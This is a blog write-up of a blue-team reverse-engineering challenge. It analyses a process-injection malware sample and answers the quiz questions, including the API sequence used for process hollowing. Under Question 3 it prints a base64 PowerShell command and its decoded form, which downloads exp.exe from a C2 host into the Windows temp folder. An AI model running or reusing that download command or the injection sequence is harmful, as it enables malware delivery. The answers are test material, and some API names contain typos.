Post

Injection Series Part 4

Posted Updated
Preview Image
By 2$0b.|3r0th3rcc 2 min read

Hi everyone ~

Don’t forget the warning

image

Question 1) What is the process that would be first spawned by the sample? And what is the API used? (Format: Format: process, APICall) (1 points)

The tags of the topic are also mentioned, this time I still use IDA

The question tells us to find the process that was first created with the malicious file and which API was used.

OK, go to IDA via the Strings tab and you will see it immediately

image

yah, now go to the IDA View-A tab to see which APIcall it used

image

notepad.exe, CreateProcessA

Question 2) The value 4 has been pushed as a parameter to this API, what does that denote? (Format: FLAG) (1 points)

I still don’t quite understand what it will do @~@, go to GG and look it up

image

And these parameters are of API(CreateProcessA) hmmm…

After a while of consulting, I found this CreateProcessA function

image

Please read it, it’s very useful

image

With a value of 4 (0x00000004), tt is used to load the process in suspended mode and will not run until the ResumaThread function is opened

image

Create_Suspended

Question 3) What is the domain that the malware tries to connect? (Format: domain.tld) (1 points)

You remember from the previous article there was no Powershell command, let’s decode them and we will have the answer

image

1
2

SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgAGgAdAB0AHAAOgAvAC8AcwBvAG0AZQBjADIALgBzAGUAcgB2AGUAcgAvAGUAeABwAC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIABjADoAXABcAHcAaQBuAGQAbwB3AHMAXABcAHQAZQBtAHAAXABcAGUAeABwAC4AZQB4AGUACgA=

go to CyberChef and decode them

this is the result after removing the null byte

Invoke-WebRequest -Uri http://somec2.server/exp.exe -OutFile c:\\windows\\temp\\exp.exe

image

somec2.server

Question 4) What is the cmdlet used to download the file and what is the path of the file stored? (Format: CMDLET, path) (1 points)

in the sentence above :>

Invoke-Webrequest, c:\windows\temp\exp.exe

Question 5) Just after the file download instructions, a function from ntdll has been loaded and invoked by the sample. What is the function name? (Format: Function) (2 points)

Finding it seems easy XD

image

NtUnmapViewOfSection

Question 6) After the allocation of memory and writing the date into the allocated memory. What are the 2 APIs used to update the entry point and resume the thread? (Format: API, API) (2 points)

It took me a while to realize the suggestion above in the topic resume the thread

let’s focus on searching for APIs -> thread

image

SetThreadTontext, ResumeThread

Question 7) What is the MITRE ID for this technique implemented in this sample? (Format: TXXXX.XXX) (2 points)

I tried with 2 APIs I just found :)))

it’s wrongggggggg

image

Honestly, my goal is to try them all

image

But it was right to come here lol

image

T1055.002

goodbye, thank you for reading until now //~//

BTLO, Reverse Engineering
Process Injection Malware Analysis Blue Team btlo Reverse IDA Ghidra
This post is licensed under CC BY 4.0 by the author.